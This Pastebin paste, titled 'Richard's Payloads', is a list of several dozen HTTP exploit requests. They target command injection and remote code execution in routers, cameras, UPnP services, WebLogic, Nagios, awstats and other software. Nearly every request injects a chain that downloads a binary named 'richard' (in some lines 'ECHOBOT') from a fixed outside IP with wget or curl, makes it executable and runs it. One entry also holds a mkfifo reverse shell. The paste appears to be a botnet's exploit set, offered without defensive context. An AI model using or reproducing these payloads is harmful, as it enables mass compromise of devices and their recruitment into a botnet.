API tools faq
paste
Advertisement
Guest User

Richard's Payloads

a guest
Aug 6th, 2019
6,448
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.87 KB | None | 0 0
raw download clone embed print report
  1. Different payloads:
  2.  
  3. POST /portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22 HTTP/1.1
  4. Content-Length: 630
  5. Accept-Encoding: gzip, deflate
  6. Accept: /
  7. User-Agent: Hello-World
  8. Connection: keep-alive
  9.  
  10.  
  11. POST /stainfo.cgi?ifname=eth0;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  12.  
  13.  
  14. GET /cgi-bin/masterCGI?ping=nomip&user=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  15.  
  16.  
  17. GET /cgi-bin/script?cd /tmp;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  18.  
  19.  
  20. GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=%60uwget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60&pingCNT=5 HTTP/1.1
  21. Host: 192.168.0.1:80
  22. Connection: keep-alive
  23. Pragma: no-cache
  24. Cache-Control: no-cache
  25. Upgrade-Insecure-Requests: 1
  26. Connection: keep-alive
  27. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  28. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  29. Referer: http://www.target.com/Main_Analysis_Content.asp
  30. Accept-Encoding: gzip, deflate
  31. Accept-Language: en-US,en;q=0.9
  32.  
  33.  
  34. GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&pingCNT=5 HTTP/1.1
  35. Host: 192.168.1.1:80
  36. Proxy-Connection: keep-alive
  37. Authorization: Basic ZGVmYXVsdA==
  38. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  39. User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
  40. Referer: http://192.168.1.1/Main_Analysis_Content.asp
  41. Accept-Encoding: gzip,deflate,sdch
  42. Accept-Language: en-US,en;q=0.8
  43.  
  44.  
  45. GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;').exit().%24a[ HTTP/1.1
  46. sort=].phpinfo().exit().$a[
  47. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  48. Connection: Close
  49.  
  50.  
  51. GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;echo| HTTP/1.1
  52. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  53. Connection: Close
  54.  
  55.  
  56. GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;echo|awstats HTTP/1.1
  57. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  58. Connection: Close
  59.  
  60.  
  61. GET /cgi-bin/img.pl HTTP/1.1
  62. f=etc/hosts
  63. f=%Q!bin/sh -c echo 'YYY';wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; echo 'YYY'|!
  64.  
  65.  
  66. POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1
  67. User-Agent: Hello-World
  68. Host: 192.168.0.1:5120
  69. Content-type: text/xml; charset=utf-8
  70. SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
  71. M-SEARCH * HTTP/1.1
  72. HOST: 239.255.255.250:1900
  73. MAN: ssdp:discover
  74. MX: 3
  75. ST: upnp:rootdevice
  76. <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>
  77.  
  78.  
  79. POST /upnp/control/basicevent1 HTTP/1.1
  80. Host: %s:49152
  81. Connection: keep-alive
  82. Accept-Encoding: gzip, deflate Accept: */*
  83. User-Agent: python-requests/2.18.4
  84. SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo
  85. Content-Length: 393
  86. <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body><u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1"> <SmartDevURL>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /tmp/ECHOBOT</SmartDevURL> </u:SetSmartDevInfo> </s:Body> </s:Envelope>
  87.  
  88.  
  89. GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  90. Authorization: Basic YWRtaW46YWRtaW4=
  91. Server: Boa/0.94.14rc21
  92. Accept-Ranges: bytes
  93. Connection: close
  94. Content-type: text/plain
  95.  
  96.  
  97. POST /cgi-bin/file_transfer.cgi HTTP/1.1
  98. Content-Type: application/x-www-form-urlencoded
  99. file_transfer=new&dir='Pa_Notewget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richardPa_Note
  100.  
  101.  
  102. POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % 99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  103. 'SSL_CLIENT_VERIFY' : 'SUCCESS'
  104. get_package_fil:
  105. site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active
  106. User-Agent: Hello-World
  107. Connection: keep-alive
  108. <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
  109.  
  110.  
  111. POST /web/cgi-bin/usbinteract.cgi HTTP/1.1
  112. Host: 192.168.0.1:9000
  113. Content-Length: 155
  114. Content-Type: application/x-www-form-urlencoded
  115. action=7&path="|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard||
  116.  
  117.  
  118. POST /dogfood/mail/spell.php HTTP/1.1
  119. data=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  120.  
  121.  
  122. POST /apps/a3/cfg_ethping.cgi HTTP/1.1
  123. MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%26
  124.  
  125.  
  126. POST /cgi-bin/;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /tmp/ECHOBOT HTTP/1.1
  127.  
  128.  
  129. POST /service/krashrpt.php HTTP/1.1
  130. Host: 192.168.0.1:80
  131. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
  132. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  133. Accept: /
  134. User-Agent: Hello-World
  135. Accept-Language: en-US,en;q=0.5
  136. Accept-Encoding: gzip, deflate
  137. Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
  138. Connection: close
  139. Upgrade-Insecure-Requests: 1
  140. Content-Type: application/x-www-form-urlencoded
  141. Content-Length: 37
  142. kuid=id | wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  143.  
  144.  
  145. POST /soap.cgi?service=WANIPConn1 HTTP/1.1
  146. Content-Length: 649
  147. Host: 10.8.28.133:49152
  148. Content-Type: text/xml
  149. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  150. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription></NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>
  151.  
  152.  
  153. POST /webadmin/script?command=|wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  154. Content-Length: 630
  155. Accept-Encoding: gzip, deflate
  156. Accept: /
  157. User-Agent: Hello-World
  158. Connection: keep-alive
  159.  
  160.  
  161. GET /recordings/misc/callme_page.php?action=c&callmenum=@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%0D%0A%0D%0A HTTP/1.1
  162.  
  163.  
  164. GET /cgi-bin/webcm HTTP/1.1
  165. var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  166.  
  167.  
  168. POST /uapi-cgi/viewer/admin/testaction.cgi?&type=ip&ip=eth0%20wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard|ping%20-c%203%201.1.1.1|x HTTP/1.1
  169. Content-Length: 630
  170. Accept-Encoding: gzip, deflate
  171. Accept: /
  172. User-Agent: Hello-World
  173. Connection: keep-alive
  174.  
  175.  
  176. GET /api/project/repo/log/graph/%60wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60 HTTP/1.1
  177.  
  178.  
  179. POST /api/backup/logout.cgi?sid=aa HTTP/1.1
  180. Content-type: text/html
  181. wget+http://185.164.72.155/richard+-O+/tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /bin/tclsh+/tmp/ECHOBOT
  182.  
  183.  
  184. POST /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  185. Content-Length: 630
  186. Accept-Encoding: gzip, deflate
  187. Accept: /
  188. User-Agent: Hello-World
  189. Connection: keep-alive
  190.  
  191.  
  192. POST /html/SetSmarcardSettings.php HTTP/1.1
  193. Content-Length: 11660
  194. Content-Type: application/x-www-form-urlencoded
  195. Connection: close
  196. X-Powered-By: PHP/5.5.13
  197. User-Agent: joxypoxy/7.2.6
  198. HidChannelID=2&HidcmbBook=0&cmbBook=0|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08
  199.  
  200.  
  201. GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard aux&message= HTTP/1.1
  202. Host: 192.168.1.1:80
  203. Authorization: Basic YWRtaW46YWRtaW4=
  204.  
  205.  
  206. GET /awcuser/cgi-bin/vcs HTTP/1.1
  207. xml=withXsl
  208. xsl=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  209.  
  210.  
  211. GET /nagios/cgi-bin/statuswml.cgi?ping=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%3Becho+%24PATH HTTP/1.1
  212.  
  213.  
  214. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%205;%27 HTTP/1.1
  215.  
  216.  
  217. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;%27 HTTP/1.1
  218. Host: 192.168.0.1:50000
  219. Connection: keep-alive
  220. Cache-Control: max-age=0
  221. Upgrade-Insecure-Requests: 1
  222. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  223. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  224. Accept-Encoding: gzip, deflate
  225. Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  226. Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
  227.  
  228.  
  229. GET /scripts/rpc.php?action=updatetime&timeserver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  230.  
  231.  
  232. POST /op5config/welcome HTTP/1.1
  233. Connection: Close
  234. do=do=Login&password=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  235.  
  236.  
  237. GET /monitor/op5/nacoma/command_test.php?cmd_str=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  238.  
  239.  
  240. GET /OvCgi/connectedNodes.ovpl HTTP/1.1
  241. %Q!; echo YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; echo YYY| tr
  242.  
  243.  
  244. POST /_async/AsyncResponseServiceHttps HTTP/1.1
  245. Accept-Encoding: gzip, deflate
  246. Accept: */*
  247. Accept-Language: en
  248. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  249. User-Agent: Hello-World
  250. Connection: close
  251. Content-Type: text/xml
  252. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService" <soapenv:Header>
  253. <wsa:Action>xx</wsa:Action>
  254. <wsa:RelatesTo>xx</wsa:RelatesTo>
  255. </work:WorkContext> xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
  256.  
  257.  
  258. POST /moadmin/moadmin.php HTTP/1.1
  259. Host: 192.168.0.1:80
  260. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
  261. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  262. Accept-Language: en-US,en;q=0.5
  263. Accept-Encoding: gzip, deflate
  264. DNT: 1
  265. Connection: keep-alive
  266. Pragma: no-cache
  267. Cache-Control: no-cache
  268. Content-Type: application/x-www-form-urlencoded
  269. Content-Length: 34
  270. object=1;system(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard);exit
  271.  
  272.  
  273. GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  274.  
  275.  
  276. POST /parse_xml.cgi HTTP/1.1
  277. Content-Length:
  278. Content-Type: application/x-www-form-urlencoded
  279. filename=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  280.  
  281.  
  282. POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1
  283. Content-Type: multipart/form-data; boundary=
  284. <%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>
  285.  
  286.  
  287. POST /wanipcn.xml HTTP/1.1
  288. Content-Length: 630
  289. Accept-Encoding: gzip, deflate
  290. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  291. Accept: /
  292. User-Agent: Hello-World
  293. Connection: keep-alive
  294. <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
  295.  
  296.  
  297. GET /repository/annotate?rev=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  298. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  299. Connection: Close
  300.  
  301.  
  302. POST /SGPAdmin/fileRequest HTTP/1.1
  303. &invoker=&title=&params=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=
  304.  
  305.  
  306. GET /goform/formSysCmd HTTP/1.1
  307. ('<textarea rows="15" name="msg" cols="80" wrap="virtual">')
  308. ('</textarea>')
  309. {'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
  310.  
  311. POST cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;&ping_count=1&action=Apply&html_view=ping HTTP/1.1
  312.  
  313.  
  314. GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60end HTTP/1.1
  315. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  316. Connection: Close
  317.  
  318.  
  319. GET /qsrserver/device/getThumbnail?sourceUri=
  320. +-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2>&1+|+;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/f; chmod 777 /tmp/f; /tmp/f; >/tmp/f ;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150 HTTP/1.1
  321. Content-Length: 630
  322. Accept-Encoding: gzip, deflate
  323. User-Agent: Hello-World
  324. Host: 192.168.0.1:9080
  325. Connection: keep-alive
  326.  
  327.  
  328. POST /page/maintenance/lanSettings/dns HTTP/1.1
  329. Host: 192.168.0.1:80
  330. Content-Length: 64
  331. Accept: */*
  332. Origin: http://192.168.0.1
  333. X-Requested-With: XMLHttpRequest
  334. User-Agent: Testingus/1.0
  335. Content-Type: application/x-www-form-urlencoded
  336. Referer: http://192.168.0.1/maintenance
  337. Accept-Language: en-US,en;q=0.8,mk;q=0.6
  338. Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
  339. Connection: close
  340. dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60
  341.  
  342.  
  343. POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
  344. Host: 192.168.0.1
  345. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
  346. Accept: /
  347. Accept-Language: en-US,en;q=0.5
  348. Accept-Encoding: gzip, deflate
  349. Connection: close
  350. Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
  351. Content-Type: application/x-www-form-urlencoded
  352. Content-Length: 86
  353. op=export&language=english&interval=1&object_id=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  354.  
  355.  
  356. POST /upnp/control/hag HTTP/1.1
  357. Host: %s:49451
  358. Accept: text/javascript, text/html, application/xml, text/xml, */*
  359. Accept-Language: en-us,en;q=0.5
  360. Accept-Encoding: gzip, deflate
  361. X-Requested-With: XMLHttpRequest
  362. X-Prototype-Version: 1.7
  363. Content-Type: text/xml;charset=UTF-8
  364. MIME-Version: 1.0
  365. Content-Length: 311
  366. Connection: keep-alive
  367. Pragma: no-cache
  368. SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua
  369. <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)</Code> </u:RunLua></s:Body></s:Envelope>
  370.  
  371.  
  372. POST /scripts/ajaxPortal.lua HTTP/1.1
  373. User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
  374. Accept: application/json, text/javascript, */*; q=0.01
  375. Accept-Language: en-US,en;q=0.5
  376. Accept-Encoding: gzip, deflate
  377. Referer: https://www.vmware.com
  378. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  379. X-Requested-With: XMLHttpRequest
  380. Cookie: culture=en-us
  381. Connection: close
  382. destination=8.8.8.8$(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic
  383. destination=8.8.8.8$(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic
  384.  
  385.  
  386. POST /cgi-bin/rdfs.cgi HTTP/1.1
  387. Host: 192.168.0.1:80
  388. application/x-www-form-urlencoded
  389. Content-Length: 1024
  390. Client=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;&Download=submit
  391.  
  392.  
  393. GET /system.ini?loginuse&loginpas HTTP/1.1
  394.  
  395.  
  396. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://185.164.72.155/richard; chmod+777+/tmp/richard; /tmp/richard+goahead)&dir=/&mode=PORT&upload_interval=0
  397.  
  398.  
  399. GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s
  400.  
  401.  
  402. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0
  403.  
  404.  
  405. POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
  406. Host: 10.0.0.1:80
  407. User-Agent:
  408. Accept: application/json, text/javascript, */*; q=0.01
  409. Accept-Language: en-US,en;q=0.5
  410. Accept-Encoding: gzip, deflate
  411. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  412. X-Requested-With: XMLHttpRequest
  413. Referer: http://10.0.0.1/network_diagnostic_tools.php
  414. Content-Length: 91
  415. Cookie: PHPSESSID=; auth=
  416. DNT: 1
  417. X-Forwarded-For: 8.8.8.8
  418. Connection: keep-alive
  419. test_connectivity=true&destination_address=www.comcast.net || cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4
  420.  
  421.  
  422. POST /cgi-bin/cgiServer.exx HTTP/1.1
  423. Host: 10.0.75.122:80
  424. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  425. Accept-Language: en-US,en;q=0.5
  426. Accept-Encoding: gzip, deflate
  427. Authorization: Basic YWRtaW46YWRtaW4=
  428. Connection: keep-alive
  429. Content-Type: application/x-www-form-urlencoded
  430. Content-Length: 0
  431. system(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)
  432.  
  433.  
  434. GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;%22 HTTP/1.1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!